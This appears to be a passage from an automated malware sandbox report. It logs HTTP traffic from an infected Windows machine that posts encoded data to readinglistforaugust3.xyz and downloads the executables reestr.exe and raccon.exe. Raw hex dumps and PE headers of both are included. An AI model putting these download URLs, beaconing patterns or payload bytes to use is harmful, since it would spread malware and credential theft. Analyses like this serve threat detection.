40 85 48 44 9d 22 6c d2 e4 64 30 e5 28 45 d7 b7 95 6f 44 6d 98 4f f7 24 09 b9 cd c5 78 d4 b9 26 5f fe 35 ae 11 99 71 e2 8e a1 6c 28 f7 8f ef 97 a0 4d 1b 8c b6 b4 d0 76 f4 2c 5b 7d 92 dd 01 a7 1e ec c1 19 e6 ca ca ab 84 31 b4 be c5 d6 c6 2b cc 67 14 cf 59 cb 79 4e c7 cd 9e a3 e0 13 8d 90 65 b7 d2 4c 1f 71 bc 21 5e 7e f5 1b ca a3 a7 59 e4 af f4 03 e1 e7 d4 0c 7d 8f 06 8d 47 10 b0 b5 c5 0a 91 e3 74 92 3b e0 3a 5f 81 e4 ca 30 53 48 2b 7c ce 8f a6 21 61 85 16 7a 1d 4c 83 ed 89 18 08 96 38 8a b2 74 70 5e 90 e5 f0 9a 0e 54 32 1b ff be 50 40 27 48 81 b0 b0 d2 44 2f a9 82 63 2b 40 34 ac e0 5a 84 7c da e9 4e fc 17 5a 66 70 00 11 e3 d1 e2 79 47 1a 8d b4 00 b0 db 14 e8 54 94 38 23 e6 d9 94 3d 42 13 2a f9 af 54 f1 d8 f7 b4 0f 6e c0 03 2b 57 dc da 77 02 5a 65 e0 66 91 02 29 ed b2 cc 4c 8f 21 d3 9c 04 d0 86 e1 7d b9 cc ff ae b5 75 2b c6 8a 7b 79 3e 20 d3 cc ed a9 48 4b 8b 40 dc 74 94 a9 4d 5b ef 95 f5 82 73 8c 44 c1 9f 4a 5d 1d 30 c6 2a 97 99 d4 a2 9c 2c 25 57 d1 39 a6 c5 df ff 04 8e c4 79 3f 20 01 53 02 d1 69 3a 77 0f 2c 71 f4 95 d4 73 ae 8a 22 30 6f 21 40 5b e5 1d b6 7c 14 52 ba 02 65 cc f4 45 93 f6 4f f6 e6 e2 57 c7 20 13 ea dc 43 ab dc ba f5 a4 04 99 c9 71 fd a8 17 1e 54 40 8e 8c 73 90 f5 b5 c0 f6 c4 5a d8 ce f7 9a 4b 90 ec ea 10 27 d9 62 02 b7 d2 5a bb 08 fb 19 27 87 f0 12 4e e0 4a 1a 46 c4 09 d9 cb a1 b9 27 d8 1d 95 7a c6 78 12 a8 2e fd 61 dd 7f ed 3e a2 8d f3 ae bd a3 b6 67 0c ac ee 95 f1 13 a2 1a c3 3d fe 66 ca 45 34 c6 65 67 ca 4c 79 d1 f1 b4 74 8d 7e e3 da b7 8a 9c 02 dd e5 f6 5f c8 f9 c6 61 bc a4 96 ba ce af 62 b8 18 eb 32 ef 43 9c cc dc 65 98 37 1a 0b 52 de ed 54 ff f9 7e 97 e9 26 ec fe 32 44 58 96 c1 dc 19 85 ab 65 c5 b3 c7 ee 0e b7 14 80 7e 3e 00 d9 fb 05 10 4f 7a fe 01 5c 60 7d de 57 35 48 e7 a6 41 29 88 6b d5 e5 96 52 ac b3 a1 d7 53 8f 46 94 b4 53 09 37 83 48 ad 3d 11 47 fb 2f 84 f0 83 08 c7 ed 69 b8 02 3b a6 2b 95 7c 09 ee 24 7e 8e 50 bd 22 00 a0 d8 e9 53 c5 bc f1 bf 95 30 46 6f c4 f1 93 61 a6 fe f6 12 24 ef 67 0a 4d 9d 25 7f 48 9f 5c c0 37 e1 97 f3 25 c6 a1 57 03 e7 f3 8e cf 20 ce af 10 68 8f 53 60 bb 28 5f e4 34 44 4b ff b0 09 7e 95 9c 3e 32 b5 29 8d 65 99 25 72 4b Data Ascii: 3ff66/w8`iT?i[$+1>65(t%s~,>2$>D:}~;2U{K~HD3Sm@p[}wth+S'MrVo.TQ$JB~y]Cjti>%}\`&}T(4/eWoEq2HW~mIssr~/0I\\JM&PM%wxHwh (WP`Z^]T?L\|b=g4dK#]^O@HD"ld0(EoDmO$x&_5ql(Mv,[}1+gYyNeLq!^~Y}Gt;:_0SH+\|!azL8tp^T2P@'HD/c+@4Z\|NZfpyGT8#=BTn+WwZef)L!}u+{y> HK@tM[sDJ]0*,%W9y? Si:w,qs"0o!@[\|ReEOW CqT@sZK'bZ'NJF'zx.a>g=fE4egLyt~_ab2Ce7RT~&2DXe~>Oz\`}W5HA)kRSFS7H=G/i;+\|$~P"S0Foa$gM%H\7%W hS`(_4DK~>2)e%rK
Aug 24, 2021 08:49:11.557920933 CEST	1139	IN	Data Raw: b7 8b 22 4d 21 4f 11 36 84 b5 a6 2e 2d 89 1c b2 9a 47 06 86 73 70 2f 94 d1 8c 2b c2 c9 c0 0c 6e dc 64 43 ba c9 93 53 82 13 42 09 69 27 5d 7f 05 d2 37 0b e6 4a e5 55 b4 4b 54 62 00 8a 3e e1 8e 12 e5 e4 bb 9f 49 35 b2 d1 fd 76 dd da a5 c8 66 80 19 Data Ascii: "M!O6.-Gsp/+ndCSBi']7JUKTb>I5vf7wVO1Y6PmgoH\G/ap-E;-_3m]Wf=er9XTU^z1,Afcr8-UceO{)t` b(xj,9GTc
Aug 24, 2021 08:49:11.557943106 CEST	1140	IN	Data Raw: da 3a 89 a8 6b 00 ac 74 12 80 fe ef d2 15 b7 80 2a 7e d7 9b fd a8 c1 0f 52 f1 3e 94 7b b5 ff 53 d1 ab 30 08 d6 d6 74 40 7a 25 4c 10 09 72 63 e8 b5 5f 25 6f 66 2d 0f 30 15 5c 5d 82 99 1e ad 6c 80 b8 de e3 6b 1f 38 aa 8f a8 d6 b1 ec b6 e4 69 6c 43 Data Ascii: :kt*~R>{S0t@z%Lrc_%of-0\]lk8ilCNr6zTKf"LtQn/1R;QZyi8a>it5pC<=]-0y)\|tU #\|?uI
Aug 24, 2021 08:49:11.557965040 CEST	1142	IN	Data Raw: ef 20 6c 12 7d 46 58 1c f1 b9 4e dd a3 f7 7a 80 7e 3f a8 2a 34 72 61 ba ca 34 5a e7 dc 5a 35 fe a1 31 15 c9 be 27 ac c9 6b fd f1 1f 4d 2c d4 8a d5 56 b5 8c d8 85 e1 b7 89 dc 7b 41 ff e8 ec bd be a7 8a 78 89 f1 45 b3 77 72 07 84 22 51 57 c5 57 df Data Ascii: l}FXNz~?4ra4ZZ51'kM,V{AxEwr"QWWc{6X=XvNpwA$y\|<i(KdpDZKbSrM-(\:`JH-# +&lTN2U:mhFt4&}eAy*My92+m
Aug 24, 2021 08:49:11.557990074 CEST	1143	IN	Data Raw: d6 66 a4 c1 05 80 8d 65 f7 78 a1 3c 0a f5 40 e5 ef cc 1a 02 49 42 22 e4 d7 7a ed 86 c7 78 cb ce 64 00 55 0c aa e2 5d 11 e3 1b 3d e6 78 c1 c2 2f 3f 22 eb b0 30 c3 ae e4 70 fc 25 17 67 b6 79 fc 6d 87 0b b2 cc b6 79 49 a8 4e d9 52 55 94 a1 85 3c af Data Ascii: fex<@IB"zxdU]=x/?"0p%gymyINRU<VK9(bj{]9\|ReUh`C;SxpGq_R]NP)RCVlb B<*MeXE6YJ 7Q;p4X'hS<s
Aug 24, 2021 08:49:11.558012962 CEST	1144	IN	Data Raw: ed f7 1d 66 7a 64 c9 1a dd 97 58 6d 7b 85 ed d5 a0 01 e1 64 d5 7f 58 75 da d9 05 31 b1 82 9e 3b b3 05 5a 0a 20 6a 1a 9c ab 8c ac 20 68 32 51 72 de 0e fd c1 a1 a5 8a eb 2b 78 82 39 8d 21 e7 51 e8 20 3f 20 4d 70 b3 e0 68 5d 61 43 80 54 58 bd 61 aa Data Ascii: fzdXm{dXu1;Z j h2Qr+x9!Q ? Mph]aCTXaz#By\?0"kND<CA'@L[;)cvL_F8#Eb3TVPbc1i~]Q%dt4i^jt{&%>}GR181WQe#D7i6h
Aug 24, 2021 08:49:11.558037996 CEST	1146	IN	Data Raw: 14 89 c4 ec 98 09 41 7b 5c 75 c7 5e 88 e5 a8 53 e9 5b ef 7f 86 c3 14 f0 42 d3 53 eb 40 47 02 e8 cc e9 30 4d ff 56 cd e9 4e ef 96 c0 79 2d 1b e4 1e 00 19 2c fe 78 56 9a 8e 55 85 97 d2 f6 ae d4 0c 99 7a 77 ad 87 08 a4 b8 8e 96 1b bb d3 55 9d 10 a5 Data Ascii: A{\u^S[BS@G0MVNy-,xVUzwUN^/s-m_W1?1]j\\^#2DME1?z>z3KB9Wk,R2y'P>8:V6}e'-4D9+E1j5@!%2TOgA]!O
Aug 24, 2021 08:49:11.558049917 CEST	1147	IN	Data Raw: b4 2a 1b d8 90 68 ae d8 30 02 62 0b 75 05 11 46 9e 05 2e b5 72 c8 a8 9c 30 df ce ab 2d db 38 1b 98 6f 0b 72 b4 7c 54 60 86 15 fa bd 5e 85 bb 88 17 70 ad 4b bb 1b 45 51 f2 cb b8 b9 21 9a d3 e8 d6 b1 de 67 aa 4c c1 ce 4b b9 68 e1 0c e0 bc 56 5d d9 Data Ascii: *h0buF.r0-8or\|T`^pKEQ!gLKhV]dn{8dP"!Tk(6=j\&^H+X?0_#X&Oqux.Jc]P?kE?x"iT;~6{mPigh~q8qQd?VY
Aug 24, 2021 08:49:11.558070898 CEST	1149	IN	Data Raw: 3a 95 7b 1b 81 d4 f4 92 f4 23 9c 5a 92 12 01 a0 81 47 59 af 79 a6 06 a8 37 10 bf 12 ce cd b9 5a de 3a 39 e4 2a e0 44 95 8f d2 1d 7b f7 dd 95 a6 bb 96 aa 73 27 2b 46 46 c0 d1 3a d1 64 13 25 98 37 be 69 11 81 c6 ea 35 0c c8 57 e8 49 ae ad 11 d3 1e Data Ascii: :{#ZGYy7Z:9*D{s'+FF:d%7i5WId_r<Iy96;XS6UrrWF~c23E1<%ZbXonN{Yez0aR+5sR{i6&/gQh,%><`;
Aug 24, 2021 08:49:11.558095932 CEST	1150	IN	Data Raw: 92 f2 37 b9 7c 94 35 7c d9 bf 87 f5 65 ae d7 10 83 e8 94 a5 40 d5 22 64 10 0f e7 5d ab ce e3 8f 1e d6 14 44 04 c7 6b 55 d0 36 6e 3f 26 52 04 fd 98 cf 19 c5 14 61 e3 31 e7 90 9e da 96 6e 03 15 9e 15 26 1b 66 45 7f 7e ce 96 18 21 55 35 b1 1a 8d 21 Data Ascii: 7\|5\|e@"d]DkU6n?&Ra1n&fE~!U5!I3oZS3$;MN.o]S<ZTNzcXUo2~}73BNDX)dbt3s.{q#1r ({ DF`eW0H)T9Hu
Aug 24, 2021 08:49:11.581299067 CEST	1152	IN	Data Raw: de d6 ea d7 06 73 a7 9a ed 1b 8c 58 f8 4c 8e 6b ff d0 9f 55 ae 10 73 d5 4c 25 e2 69 1a d5 b5 68 d5 fb 42 80 45 c7 1c 0c 9c af a4 22 1a 34 1c b9 a5 7f 3f b0 11 3b 86 77 e6 69 67 ee 2a fb eb bf 81 0c 0f e0 c2 e1 f1 8a c5 f7 ab 67 b7 a0 df 25 04 fa Data Ascii: sXLkUsL%ihBE"4?;wigg%Y33d6\|E:YcKHMw?s}Sh9<)GiVt%ayQn-h.[(x)&aMB=-N=-@0^NyP1unN_graY/
Aug 24, 2021 08:49:11.780730963 CEST	1469	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:11.780798912 CEST	1469	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 21 bc d5 4a 99 47 ba bf 86 f4 de 53 Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q!JGSCCS#R(6)*,e
Aug 24, 2021 08:49:11.829866886 CEST	1470	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 00 00 a7 a2 7f d5 7f 6b 10 19 36 87 8f bf a7 46 90 6c 01 06 a1 6d 47 49 35 93 59 0b a5 f2 c1 9d 60 dd dc bd 17 c5 d4 e5 a0 52 7a bb d1 87 1d e5 31 7d 50 0d 1f 53 3f Data Ascii: k6FlmGI5Y`Rz1}PS?
Aug 24, 2021 08:49:11.843343973 CEST	1470	OUT	GET /reestr.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:11.889354944 CEST	1471	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:11 GMT Content-Type: application/x-msdos-program Content-Length: 24576 Connection: keep-alive Keep-Alive: timeout=3 Last-Modified: Tue, 17 Aug 2021 14:34:32 GMT ETag: "6000-5c9c2374e92ba" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 4b c4 db 9d 2a aa 88 9d 2a aa 88 9d 2a aa 88 1e 36 a4 88 9c 2a aa 88 f4 35 a3 88 9f 2a aa 88 74 35 a7 88 9c 2a aa 88 52 69 63 68 9d 2a aa 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee fd 3a 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 00 00 00 20 00 00 00 00 00 00 78 12 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 16 00 0b 00 04 00 00 00 00 00 00 00 00 60 00 00 00 10 00 00 83 62 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 2e 00 00 28 00 00 00 00 50 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 22 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 84 03 00 00 00 40 00 00 00 10 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 0a 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$K**65t5Rich*PEL:]0 x@@`bT.(P\|0 .textP"0 `.data@@@.rsrc\|PP@@IMSVBVM60.DLL
Aug 24, 2021 08:49:12.258708954 CEST	1528	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 347 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:12.259216070 CEST	1528	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 87 1c 21 bc d5 4a 98 47 ba bf b5 c2 e2 46 Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q!JGFWT }%8>EOm^/O?0wcUzZziV.HfP^dbRn1\"vlk)QB"N]+u,Bh
Aug 24, 2021 08:49:12.304975986 CEST	1542	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:12.326657057 CEST	1543	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 243 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:12.326795101 CEST	1543	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 20 bc d5 4a 99 47 ba bf 94 8f c3 37 Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q JG7{G KO8r'29Rbj..#zgd:pEQ{u[*zp:K4oOjcHghvJR<h[f[]tx^
Aug 24, 2021 08:49:12.371862888 CEST	1544	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:12.389601946 CEST	1544	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:12.389637947 CEST	1544	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 23 bc d5 4a 99 47 ba bf cb f7 9a 2f Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q#JG/@DCzS*_?uk+<[Dc+F5V<iJCUn
Aug 24, 2021 08:49:12.437393904 CEST	1545	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 00 00 a7 a2 7f d5 7f 6b 10 19 36 87 8f bf a7 46 90 6c 01 06 a1 6d 47 49 35 93 59 0b a5 f2 c1 9d 60 dd dc bd 17 c5 d4 e5 a0 52 7a bb d1 87 19 e3 21 66 4c 0d 1f 53 3f Data Ascii: k6FlmGI5Y`Rz!fLS?
Aug 24, 2021 08:49:12.458683968 CEST	1545	OUT	GET /raccon.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:12.535315990 CEST	1546	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:12 GMT Content-Type: application/x-msdos-program Content-Length: 439296 Connection: keep-alive Keep-Alive: timeout=3 Last-Modified: Tue, 24 Aug 2021 06:49:01 GMT ETag: "6b400-5ca48876363f2" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ce 1e c0 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6e 05 00 00 7a 8a 02 00 00 00 00 1e 24 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 8f 02 00 04 00 00 05 e4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 c0 05 00 51 00 00 00 f0 b5 05 00 3c 00 00 00 00 d0 8e 02 98 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 81 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9d 05 00 18 00 00 00 d8 9c 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 6c 05 00 00 10 00 00 00 6e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 81 40 00 00 00 80 05 00 00 42 00 00 00 72 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 88 02 00 d0 05 00 00 3a 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 c5 00 00 00 d0 8e 02 00 c6 00 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 